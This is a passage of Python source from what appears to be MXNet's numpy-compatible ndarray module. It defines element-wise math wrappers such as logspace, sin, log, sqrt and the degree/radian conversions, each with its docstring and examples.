    return samples, step
@set_module('mxnet.ndarray.numpy')
def logspace(start, stop, num=50, endpoint=True, base=10.0, dtype=None, axis=0, ctx=None):  # pylint: disable=too-many-arguments
    r"""Return numbers spaced evenly on a log scale.

    In linear space, the sequence starts at ``base ** start`` (`base` to
    the power of `start`) and ends with ``base ** stop`` (see `endpoint`
    below).

    Parameters
    ----------
    start : int or float
        ``base ** start`` is the starting value of the sequence.
    stop : int or float
        ``base ** stop`` is the final value of the sequence, unless
        `endpoint` is False. In that case, ``num + 1`` values are spaced
        over the interval in log-space, of which all but the last (a
        sequence of length `num`) are returned.
    num : integer, optional
        Number of samples to generate. Default is 50.
    endpoint : boolean, optional
        If true, `stop` is the last sample. Otherwise, it is not
        included. Default is True.
    base : float, optional
        The base of the log space. The step size between the elements in
        ``ln(samples) / ln(base)`` (or ``log_base(samples)``) is uniform.
        Default is 10.0.
    dtype : dtype
        The type of the output array. If `dtype` is not given, infer the
        data type from the other input arguments.
    axis : int, optional
        The axis in the result to store the samples. Only ``axis = 0`` is
        currently supported.
    ctx : Context, optional
        An optional device context (default is the current default context).

    Returns
    -------
    samples : ndarray
        `num` samples, equally spaced on a log scale.

    See Also
    --------
    arange : Similar to linspace, with the step size specified instead of
        the number of samples.
    linspace : Similar to logspace, but with the samples uniformly
        distributed in linear space, instead of log space.

    Examples
    --------
    >>> np.logspace(2.0, 3.0, num=4)
    array([ 100.     ,  215.44347,  464.15887, 1000.     ])
    >>> np.logspace(2.0, 3.0, num=4, endpoint=False)
    array([100.     , 177.82794, 316.22775, 562.3413 ])
    >>> np.logspace(2.0, 3.0, num=4, base=2.0)
    array([4.       , 5.0396843, 6.349604 , 8.       ])
    >>> np.logspace(2.0, 3.0, num=4, base=2.0, dtype=np.int32)
    array([4, 5, 6, 8], dtype=int32)
    """
    # Array-like endpoints are not supported by the backend operator.
    scalar_ok = not (isinstance(start, (list, tuple, _np.ndarray, NDArray))
                     or isinstance(stop, (list, tuple, _np.ndarray, NDArray)))
    if not scalar_ok:
        raise NotImplementedError('start and stop only support int and float')
    if axis != 0:
        raise NotImplementedError("the function only support axis 0")
    if ctx is None:
        ctx = current_context()
    return _npi.logspace(start=start, stop=stop, num=num, endpoint=endpoint, base=base, ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def expand_dims(a, axis):
    """Expand the shape of an array by inserting a new axis.

    The new axis appears at the `axis` position of the expanded shape.

    Parameters
    ----------
    a : ndarray
        Input array.
    axis : int
        Position in the expanded axes where the new axis is placed.

    Returns
    -------
    res : ndarray
        Output array. The number of dimensions is one greater than that
        of the input array.
    """
    expanded = _npi.expand_dims(a, axis)
    return expanded
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def lcm(x1, x2, out=None, **kwargs):
    """
    Returns the lowest common multiple of ``|x1|`` and ``|x2|``.

    Parameters
    ----------
    x1, x2 : ndarrays or scalar values
        The arrays for computing lowest common multiple. If
        x1.shape != x2.shape, they must be broadcastable to a common
        shape (which may be the shape of one or the other).
    out : ndarray or None, optional
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        None, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray or scalar
        The lowest common multiple of the absolute value of the inputs.
        This is a scalar if both `x1` and `x2` are scalars.

    See Also
    --------
    gcd : The greatest common divisor

    Examples
    --------
    >>> np.lcm(12, 20)
    60
    >>> np.lcm(np.arange(6, dtype=int), 20)
    array([ 0, 20, 20, 60, 20, 20], dtype=int64)
    """
    result = _ufunc_helper(x1, x2, _npi.lcm, _np.lcm, _npi.lcm_scalar, None, out)
    return result
@set_module('mxnet.ndarray.numpy')
def tril(m, k=0):
    r"""
    Lower triangle of an array.

    Return a copy of an array with elements above the `k`-th diagonal
    zeroed.

    Parameters
    ----------
    m : ndarray, shape (M, N)
        Input array.
    k : int, optional
        Diagonal above which to zero elements. `k = 0` (the default) is
        the main diagonal, `k < 0` is below it and `k > 0` is above.

    Returns
    -------
    tril : ndarray, shape (M, N)
        Lower triangle of `m`, of same shape and data-type as `m`.

    See Also
    --------
    triu : same thing, only for the upper triangle

    Examples
    --------
    >>> a = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]])
    >>> np.tril(a, -1)
    array([[ 0.,  0.,  0.],
           [ 4.,  0.,  0.],
           [ 7.,  8.,  0.],
           [10., 11., 12.]])
    """
    lower = _npi.tril(m, k)
    return lower
def _unary_func_helper(x, fn_array, fn_scalar, out=None, **kwargs):
    """Dispatch a unary operator to its scalar or ndarray implementation.

    Parameters
    ----------
    x : ndarray or scalar
        Input of the unary operator.
    fn_array : function
        Function to be called if x is of ``ndarray`` type.
    fn_scalar : function
        Function to be called if x is a Python scalar.
    out : ndarray
        The buffer ndarray for storing the result of the unary function.

    Returns
    -------
    out : mxnet.numpy.ndarray or scalar
        Result array or scalar.
    """
    # Scalars bypass the backend entirely; `out` only applies to ndarrays.
    if isinstance(x, numeric_types):
        return fn_scalar(x, **kwargs)
    if isinstance(x, NDArray):
        return fn_array(x, out=out, **kwargs)
    raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sin(x, out=None, **kwargs):
    r"""
    Trigonometric sine, element-wise.

    Parameters
    ----------
    x : ndarray or scalar
        Angle, in radians (:math:`2 \pi` rad equals 360 degrees).
    out : ndarray or None
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        None, a freshly-allocated array is returned. The dtype of the
        output is the same as that of the input if the input is an
        ndarray.

    Returns
    -------
    y : ndarray or scalar
        The sine of each element of x. This is a scalar if `x` is a
        scalar.

    Notes
    -----
    This function only supports input type of float.

    Examples
    --------
    >>> np.sin(np.pi/2.)
    1.0
    >>> np.sin(np.array((0., 30., 45., 60., 90.)) * np.pi / 180.)
    array([0.        , 0.5       , 0.70710677, 0.86602545, 1.        ])
    """
    return _unary_func_helper(x, fn_array=_npi.sin, fn_scalar=_np.sin, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cos(x, out=None, **kwargs):
    r"""
    Cosine, element-wise.

    Parameters
    ----------
    x : ndarray or scalar
        Angle, in radians (:math:`2 \pi` rad equals 360 degrees).
    out : ndarray or None
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        None, a freshly-allocated array is returned. The dtype of the
        output is the same as that of the input if the input is an
        ndarray.

    Returns
    -------
    y : ndarray or scalar
        The corresponding cosine values. This is a scalar if x is a
        scalar.

    Notes
    -----
    This function only supports input type of float.

    Examples
    --------
    >>> np.cos(np.array([0, np.pi/2, np.pi]))
    array([ 1.000000e+00, -4.371139e-08, -1.000000e+00])
    >>> # Example of providing the optional output parameter
    >>> out1 = np.array([0], dtype='f')
    >>> out2 = np.cos(np.array([0.1]), out1)
    >>> out2 is out1
    True
    """
    return _unary_func_helper(x, fn_array=_npi.cos, fn_scalar=_np.cos, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sinh(x, out=None, **kwargs):
    """
    Hyperbolic sine, element-wise.

    Equivalent to ``1/2 * (np.exp(x) - np.exp(-x))`` or
    ``-1j * np.sin(1j*x)``.

    Parameters
    ----------
    x : ndarray or scalar
        Input array or scalar.
    out : ndarray or None
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        None, a freshly-allocated array is returned. The dtype of the
        output is the same as that of the input if the input is an
        ndarray.

    Returns
    -------
    y : ndarray or scalar
        The corresponding hyperbolic sine values. This is a scalar if
        `x` is a scalar.

    Notes
    -----
    This function only supports input type of float.

    Examples
    --------
    >>> np.sinh(0)
    0.0
    >>> # Example of providing the optional output parameter
    >>> out1 = np.array([0], dtype='f')
    >>> out2 = np.sinh(np.array([0.1]), out1)
    >>> out2 is out1
    True
    """
    result = _unary_func_helper(x, _npi.sinh, _np.sinh, out=out, **kwargs)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cosh(x, out=None, **kwargs):
    """
    Hyperbolic cosine, element-wise.

    Equivalent to ``1/2 * (np.exp(x) + np.exp(-x))`` and ``np.cos(1j*x)``.

    Parameters
    ----------
    x : ndarray or scalar
        Input array or scalar.
    out : ndarray or None
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        None, a freshly-allocated array is returned. The dtype of the
        output is the same as that of the input if the input is an
        ndarray.

    Returns
    -------
    y : ndarray or scalar
        The corresponding hyperbolic cosine values. This is a scalar if
        `x` is a scalar.

    Notes
    -----
    This function only supports input type of float.

    Examples
    --------
    >>> np.cosh(0)
    1.0
    """
    result = _unary_func_helper(x, _npi.cosh, _np.cosh, out=out, **kwargs)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def tanh(x, out=None, **kwargs):
    """
    Compute hyperbolic tangent element-wise.
    Equivalent to ``np.sinh(x)/np.cosh(x)``.
    Parameters
    ----------
    x : ndarray or scalar.
        Input array.
    out : ndarray or None
        A location into which the result is stored. If provided, it
        must have a shape that the inputs fill into. If not provided
        or None, a freshly-allocated array is returned. The dtype of the
        output and input must be the same.
    Returns
    -------
    y : ndarray or scalar
        The corresponding hyperbolic tangent values.
    Notes
    -----
    If `out` is provided, the function writes the result into it,
    and returns a reference to `out`. (See Examples)
    - input x does not support complex computation (like imaginary number)
    >>> np.tanh(np.pi*1j)
    TypeError: type <type 'complex'> not supported
    Examples
    --------
    >>> np.tanh(np.array([0, np.pi]))
    array([0.       , 0.9962721])
    >>> np.tanh(np.pi)
    0.99627207622075
    >>> # Example of providing the optional output parameter illustrating
    >>> # that what is returned is a reference to said parameter
    >>> out1 = np.array(1)
    >>> out2 = np.tanh(np.array(0.1), out1)
    >>> out2 is out1
    True
    """
    # Dispatches to the backend op for NDArray input and to numpy for scalars.
    return _unary_func_helper(x, _npi.tanh, _np.tanh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log10(x, out=None, **kwargs):
    """
    Return the base 10 logarithm of the input array, element-wise.
    Parameters
    ----------
    x : ndarray or scalar
        Input array or scalar.
    out : ndarray or None
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not provided
        or None, a freshly-allocated array is returned. The dtype of the
        output is the same as that of the input if the input is an ndarray.
    Returns
    -------
    y : ndarray or scalar
        The logarithm to the base 10 of `x`, element-wise. NaNs are
        returned where x is negative. This is a scalar if `x` is a scalar.
    Notes
    ----
    This function only supports input type of float.
    Examples
    --------
    >>> np.log10(np.array([1e-15, -3.]))
    array([-15.,  nan])
    """
    # Dispatches to the backend op for NDArray input and to numpy for scalars.
    return _unary_func_helper(x, _npi.log10, _np.log10, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sqrt(x, out=None, **kwargs):
    """
    Return the non-negative square-root of an array, element-wise.

    Parameters
    ----------
    x : ndarray or scalar
        The values whose square-roots are required.
    out : ndarray, or None, optional
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        `None`, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray or scalar
        An array of the same shape as `x`, containing the positive
        square-root of each element in `x`. This is a scalar if `x` is
        a scalar.

    Notes
    -----
    This function only supports input type of float.

    Examples
    --------
    >>> np.sqrt(np.array([1,4,9]))
    array([1., 2., 3.])
    >>> np.sqrt(np.array([4, -1, _np.inf]))
    array([ 2., nan, inf])
    """
    return _unary_func_helper(x, fn_array=_npi.sqrt, fn_scalar=_np.sqrt, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def cbrt(x, out=None, **kwargs):
    r"""
    Return the cube-root of an array, element-wise.

    Parameters
    ----------
    x : ndarray
        The values whose cube-roots are required.
    out : ndarray, optional
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        None, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray
        An array of the same shape as x, containing the cube-root of
        each element in x. If out was provided, y is a reference to it.
        This is a scalar if x is a scalar.

    Examples
    --------
    >>> np.cbrt(np.array([1, 8, 27]))
    array([1., 2., 3.])
    """
    result = _unary_func_helper(x, _npi.cbrt, _np.cbrt, out=out, **kwargs)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def abs(x, out=None, **kwargs):
    r"""
    Calculate the absolute value element-wise.

    Parameters
    ----------
    x : ndarray or scalar
        Input array.
    out : ndarray or None, optional
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        `None`, a freshly-allocated array is returned.

    Returns
    -------
    absolute : ndarray
        An ndarray containing the absolute value of each element in `x`.
        This is a scalar if `x` is a scalar.

    Examples
    --------
    >>> x = np.array([-1.2, 1.2])
    >>> np.abs(x)
    array([1.2, 1.2])
    """
    return _unary_func_helper(x, fn_array=_npi.abs, fn_scalar=_np.abs, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def absolute(x, out=None, **kwargs):
    r"""
    Calculate the absolute value element-wise.

    ``np.abs`` is a shorthand for this function.

    Parameters
    ----------
    x : ndarray
        Input array.
    out : ndarray, optional
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        None, a freshly-allocated array is returned.

    Returns
    -------
    absolute : ndarray
        An ndarray containing the absolute value of each element in x.

    Examples
    --------
    >>> x = np.array([-1.2, 1.2])
    >>> np.absolute(x)
    array([ 1.2,  1.2])
    """
    result = _unary_func_helper(x, _npi.absolute, _np.absolute, out=out, **kwargs)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def sign(x, out=None, **kwargs):
    r"""
    Returns an element-wise indication of the sign of a number.

    The `sign` function returns ``-1 if x < 0, 0 if x==0, 1 if x > 0``.
    Only supports real number.

    Parameters
    ----------
    x : ndarray or a scalar
        Input values.
    out : ndarray or None, optional
        A location into which the result is stored. If provided, it must
        have the same shape and dtype as the input ndarray. If not
        provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray
        The sign of `x`. This is a scalar if `x` is a scalar.

    Notes
    -----
    - Only supports real number as input elements.
    - Input type does not support Python native iterables (list, tuple, ...).
    - ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape
      must be the same as the expected output.
    - ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype
      must be the same as the expected output.
    - ``out`` param does not support scalar input case.

    Examples
    --------
    >>> a = np.array([-5., 4.5])
    >>> np.sign(a)
    array([-1.,  1.])
    >>> # Use scalars as inputs:
    >>> np.sign(4.0)
    1.0
    >>> np.sign(0)
    0
    >>> # Use ``out`` parameter:
    >>> b = np.zeros((2, ))
    >>> np.sign(a, out=b)
    array([-1.,  1.])
    >>> b
    array([-1.,  1.])
    """
    return _unary_func_helper(x, fn_array=_npi.sign, fn_scalar=_np.sign, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def exp(x, out=None, **kwargs):
    r"""
    Calculate the exponential of all elements in the input array.

    Parameters
    ----------
    x : ndarray or scalar
        Input values.
    out : ndarray or None, optional
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray or scalar
        Output array, element-wise exponential of `x`. This is a scalar
        if `x` is a scalar.

    Examples
    --------
    >>> np.exp(1)
    2.718281828459045
    >>> x = np.array([-1, 1, -2, 2])
    >>> np.exp(x)
    array([0.36787945, 2.7182817 , 0.13533528, 7.389056  ])
    """
    result = _unary_func_helper(x, _npi.exp, _np.exp, out=out, **kwargs)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def expm1(x, out=None, **kwargs):
    r"""
    Calculate ``exp(x) - 1`` of all elements in the input array.

    Parameters
    ----------
    x : ndarray or scalar
        Input values.
    out : ndarray or None, optional
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray or scalar
        Output array, element-wise exponential minus one:
        ``out = exp(x) - 1``. This is a scalar if `x` is a scalar.

    Examples
    --------
    >>> np.expm1(1)
    1.718281828459045
    >>> x = np.array([-1, 1, -2, 2])
    >>> np.expm1(x)
    array([-0.63212056,  1.71828183, -0.86466472,  6.3890561])
    """
    return _unary_func_helper(x, fn_array=_npi.expm1, fn_scalar=_np.expm1, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arcsin(x, out=None, **kwargs):
    r"""
    Inverse sine, element-wise.

    Parameters
    ----------
    x : ndarray or scalar
        `y`-coordinate on the unit circle.
    out : ndarray or None, optional
        A location into which the result is stored. If provided, it must
        have the same shape as the input. If not provided or None, a
        freshly-allocated array is returned.

    Returns
    -------
    angle : ndarray or scalar
        Output array is same shape and type as x. This is a scalar if x
        is a scalar. The inverse sine of each element in `x`, in radians
        and in the closed interval ``[-pi/2, pi/2]``.

    Examples
    --------
    >>> np.arcsin(1)     # pi/2
    1.5707963267948966
    >>> np.arcsin(-1)    # -pi/2
    -1.5707963267948966
    >>> np.arcsin(0)
    0.0

    Notes
    -----
    `arcsin` is a multivalued function: for each `x` there are infinitely
    many numbers `z` such that :math:`sin(z) = x`. The convention is to
    return the angle `z` whose real part lies in [-pi/2, pi/2].
    For real-valued input data types, *arcsin* always returns real output.
    For each value that cannot be expressed as a real number or infinity,
    it yields ``nan`` and sets the `invalid` floating point error flag.
    The inverse sine is also known as `asin` or sin^{-1}.
    The output `ndarray` has the same `ctx` as the input `ndarray`.
    This function differs from the original `numpy.arcsin
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.arcsin.html>`_ in
    the following aspects:
    - Only support ndarray or scalar now.
    - `where` argument is not supported.
    - Complex input is not supported.

    References
    ----------
    Abramowitz, M. and Stegun, I. A., *Handbook of Mathematical Functions*,
    10th printing, New York: Dover, 1964, pp. 79ff.
    http://www.math.sfu.ca/~cbm/aands/
    """
    result = _unary_func_helper(x, _npi.arcsin, _np.arcsin, out=out, **kwargs)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arccos(x, out=None, **kwargs):
    r"""
    Trigonometric inverse cosine, element-wise.

    The inverse of cos so that, if ``y = cos(x)``, then ``x = arccos(y)``.

    Parameters
    ----------
    x : ndarray
        x-coordinate on the unit circle. For real arguments, the domain
        is [-1, 1].
    out : ndarray, optional
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        None, a freshly-allocated array is returned.

    Returns
    -------
    angle : ndarray
        The angle of the ray intersecting the unit circle at the given
        x-coordinate in radians [0, pi]. This is a scalar if x is a
        scalar.

    See Also
    --------
    cos, arctan, arcsin

    Notes
    -----
    arccos is a multivalued function: for each x there are infinitely
    many numbers z such that cos(z) = x. The convention is to return the
    angle z whose real part lies in [0, pi].
    For real-valued input data types, arccos always returns real output.
    For each value that cannot be expressed as a real number or infinity,
    it yields nan and sets the invalid floating point error flag.
    The inverse cos is also known as acos or cos^-1.

    Examples
    --------
    >>> np.arccos([1, -1])
    array([ 0.        ,  3.14159265])
    """
    return _unary_func_helper(x, fn_array=_npi.arccos, fn_scalar=_np.arccos, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arctan(x, out=None, **kwargs):
    r"""
    Trigonometric inverse tangent, element-wise.

    The inverse of tan, so that if ``y = tan(x)`` then ``x = arctan(y)``.

    Parameters
    ----------
    x : ndarray or scalar
        Input values.
    out : ndarray or None, optional
        A location into which the result is stored. If provided, it must
        have a shape that the inputs broadcast to. If not provided or
        `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray or scalar
        Out has the same shape as `x`. It lies in ``[-pi/2, pi/2]``
        (``arctan(+/-inf)`` returns ``+/-pi/2``). This is a scalar if
        `x` is a scalar.

    Notes
    -----
    `arctan` is a multi-valued function: for each `x` there are
    infinitely many numbers `z` such that tan(`z`) = `x`. The convention
    is to return the angle `z` whose real part lies in [-pi/2, pi/2].
    For real-valued input data types, `arctan` always returns real
    output. For each value that cannot be expressed as a real number or
    infinity, it yields ``nan`` and sets the `invalid` floating point
    error flag. For complex-valued input, we do not have support for
    them yet. The inverse tangent is also known as `atan` or tan^{-1}.

    Examples
    --------
    >>> x = np.array([0, 1])
    >>> np.arctan(x)
    array([0.       , 0.7853982])
    >>> np.pi/4
    0.7853981633974483
    """
    result = _unary_func_helper(x, _npi.arctan, _np.arctan, out=out, **kwargs)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log(x, out=None, **kwargs):
    """
    Natural logarithm, element-wise.

    The natural logarithm `log` is the inverse of the exponential
    function, so that `log(exp(x)) = x`. The natural logarithm is
    logarithm in base `e`.

    Parameters
    ----------
    x : ndarray
        Input value. Elements must be of real value.
    out : ndarray or None, optional
        A location into which the result is stored. If provided, it must
        have the same shape and dtype as input ndarray. If not provided
        or `None`, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray
        The natural logarithm of `x`, element-wise. This is a scalar if
        `x` is a scalar.

    Notes
    -----
    Currently only supports data of real values and ``inf`` as input.
    Returns data of real value, ``inf``, ``-inf`` and ``nan`` according
    to the input.
    This function differs from the original `numpy.log
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.log.html>`_ in
    the following aspects:
    - Does not support complex number for now
    - Input type does not support Python native iterables (list, tuple, ...).
    - ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape
      must be the same as the expected output.
    - ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype
      must be the same as the expected output.
    - ``out`` param does not support scalar input case.

    Examples
    --------
    >>> a = np.array([1, np.exp(1), np.exp(2), 0], dtype=np.float64)
    >>> np.log(a)
    array([  0.,   1.,   2., -inf], dtype=float64)
    >>> # Using default float32 dtype may lead to slightly different behavior:
    >>> a = np.array([1, np.exp(1), np.exp(2), 0], dtype=np.float32)
    >>> np.log(a)
    array([  0.,  0.99999994,   2., -inf])
    >>> np.log(1)
    0.0
    """
    return _unary_func_helper(x, fn_array=_npi.log, fn_scalar=_np.log, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def degrees(x, out=None, **kwargs):
    """
    Convert angles from radians to degrees.

    Parameters
    ----------
    x : ndarray
        Input value. Elements must be of real value.
    out : ndarray or None, optional
        A location into which the result is stored. If provided, it must
        have the same shape and dtype as input ndarray. If not provided
        or `None`, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray
        The corresponding degree values; if `out` was supplied this is a
        reference to it. This is a scalar if `x` is a scalar.

    Notes
    -----
    This function differs from the original `numpy.degrees
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.degrees.html>`_ in
    the following aspects:
    - Input type does not support Python native iterables (list, tuple, ...).
      Only ndarray is supported.
    - ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape
      must be the same as the expected output.
    - ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype
      must be the same as the expected output.
    - ``out`` param does not support scalar input case.

    Examples
    --------
    >>> rad = np.arange(12.) * np.pi / 6
    >>> np.degrees(rad)
    array([  0.,  30.,  60.,  90., 120., 150., 180., 210., 240., 270., 300., 330.])
    >>> # Use specified ``out`` ndarray:
    >>> out = np.zeros((rad.shape))
    >>> np.degrees(rad, out)
    array([  0.,  30.,  60.,  90., 120., 150., 180., 210., 240., 270., 300., 330.])
    >>> out
    array([  0.,  30.,  60.,  90., 120., 150., 180., 210., 240., 270., 300., 330.])
    """
    result = _unary_func_helper(x, _npi.degrees, _np.degrees, out=out, **kwargs)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def rad2deg(x, out=None, **kwargs):
    r"""
    Convert angles from radians to degrees.

    Parameters
    ----------
    x : ndarray or scalar
        Angles in radians.
    out : ndarray or None, optional
        A location into which the result is stored. If not provided or
        `None`, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray or scalar
        The corresponding angle in degrees.
        This is a scalar if `x` is a scalar.

    Notes
    -----
    "rad2deg(x)" is "x * 180 / pi".

    This function differs from the original numpy.rad2deg in the
    following aspects:
    - Only support float32 and float64.
    - `out` must be in the same size of input.

    Examples
    --------
    >>> np.rad2deg(np.pi/2)
    90.0
    """
    # Forward **kwargs like every sibling wrapped by wrap_np_unary_func;
    # previously they were silently dropped here.  The old docstring also
    # had the direction inverted (degrees -> radians).
    return _unary_func_helper(x, _npi.rad2deg, _np.rad2deg, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def rint(x, out=None, **kwargs):
    """
    Round elements of the array to the nearest integer.

    Parameters
    ----------
    x : ndarray or scalar
        Input array.
    out : ndarray or None
        A location into which the result is stored. If provided, it must
        have the same shape and type as the input. If not provided or
        None, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray or scalar
        Output array is same shape and type as x. This is a scalar if x
        is a scalar.

    Notes
    -----
    This function differs from the original `numpy.rint
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.rint.html>`_ in
    the following way(s):
    - only ndarray or scalar is accepted as valid input, tuple of ndarray
      is not supported
    - broadcasting to `out` of different shape is currently not supported
    - when input is plain python numerics, the result will not be stored
      in the `out` param

    Examples
    --------
    >>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
    >>> np.rint(a)
    array([-2., -2., -0.,  0.,  1.,  2.,  2.])
    """
    return _unary_func_helper(x, fn_array=_npi.rint, fn_scalar=_np.rint, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log2(x, out=None, **kwargs):
    """
    Base-2 logarithm of x.

    Parameters
    ----------
    x : ndarray or scalar
        Input values.
    out : ndarray or None
        A location into which the result is stored. If provided, it must
        have the same shape and type as the input. If not provided or
        None, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray
        The logarithm base two of `x`, element-wise. This is a scalar if
        `x` is a scalar.

    Notes
    -----
    This function differs from the original `numpy.log2
    <https://www.google.com/search?q=numpy+log2>`_ in
    the following way(s):
    - only ndarray or scalar is accepted as valid input, tuple of ndarray
      is not supported
    - broadcasting to `out` of different shape is currently not supported
    - when input is plain python numerics, the result will not be stored
      in the `out` param

    Examples
    --------
    >>> x = np.array([0, 1, 2, 2**4])
    >>> np.log2(x)
    array([-inf,   0.,   1.,   4.])
    """
    result = _unary_func_helper(x, _npi.log2, _np.log2, out=out, **kwargs)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log1p(x, out=None, **kwargs):
    """
    Return the natural logarithm of one plus the input array, element-wise.
    Computes ``log(1 + x)``.
    Parameters
    ----------
    x : ndarray or scalar
        Input array.
    out : ndarray or None
        Where to store the result. When given, its shape must match the
        input's; when omitted or None, a new array is allocated. Output and
        input must share the same dtype.
    Returns
    -------
    y : ndarray or scalar
        Natural logarithm of ``1 + x``, element-wise. A scalar if `x`
        is a scalar.
    Notes
    -----
    For real input, `log1p` remains accurate even when `x` is so small that
    ``1 + x == 1`` in floating point.
    For real-valued dtypes the output is always real; values with no real
    logarithm yield ``nan`` and set the `invalid` floating point error flag.
    Complex-valued input is not supported.
    Examples
    --------
    >>> np.log1p(1e-99)
    1e-99
    >>> a = np.array([3, 4, 5])
    >>> np.log1p(a)
    array([1.3862944, 1.609438 , 1.7917595])
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    return _unary_func_helper(x, _npi.log1p, _np.log1p, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def radians(x, out=None, **kwargs):
    """
    Convert angles from degrees to radians.
    Parameters
    ----------
    x : ndarray or scalar
        Input array in degrees.
    out : ndarray or None
        Where to store the result. When given, it must have the same shape
        and type as the input; when omitted or None, a new array is allocated.
    Returns
    -------
    y : ndarray
        The corresponding radian values. A scalar if `x` is a scalar.
    Notes
    -----
    Differences from the official `numpy.radians`:
    - only an ndarray or a scalar is accepted (no tuple of ndarrays)
    - broadcasting into an `out` of a different shape is not supported
    - plain Python numeric input does not store its result in `out`
    Examples
    --------
    >>> deg = np.arange(12.) * 30.
    >>> np.radians(deg)
    array([0.       , 0.5235988, 1.0471976, 1.5707964, 2.0943952, 2.6179938,
           3.1415927, 3.6651914, 4.1887903, 4.712389 , 5.2359877, 5.7595863],
           dtype=float32)
    """
    # ndarrays dispatch to the MXNet operator, scalars fall back to NumPy.
    converted = _unary_func_helper(x, _npi.radians, _np.radians, out=out, **kwargs)
    return converted
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def deg2rad(x, out=None, **kwargs):
    r"""
    Convert angles from degrees to radians.
    Parameters
    ----------
    x : ndarray or scalar
        Angles in degrees.
    out : ndarray or None, optional
        Where to store the result. When omitted or `None`, a new array
        is allocated.
    Returns
    -------
    y : ndarray or scalar
        The corresponding angle in radians.
        A scalar if `x` is a scalar.
    Notes
    -----
    "deg2rad(x)" is "x * pi / 180".
    Differences from the official numpy version:
    - Only float32 and float64 are supported.
    - `out` must have the same size as the input.
    Examples
    --------
    >>> np.deg2rad(180)
    3.1415927
    """
    # NOTE: extra kwargs are intentionally not forwarded here, matching the
    # original implementation of this wrapper.
    return _unary_func_helper(x, _npi.deg2rad, _np.deg2rad, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def reciprocal(x, out=None, **kwargs):
    r"""
    Return the reciprocal of the argument, element-wise.
    Computes ``1/x``.
    Parameters
    ----------
    x : ndarray or scalar
        The values whose reciprocals are required.
    out : ndarray or None, optional
        Where to store the result. When given, its shape must match the
        input's; when omitted or None, a new array is allocated.
    Returns
    -------
    y : ndarray or scalar
        Same shape and type as `x`. A scalar if `x` is a scalar.
    Examples
    --------
    >>> np.reciprocal(2.)
    0.5
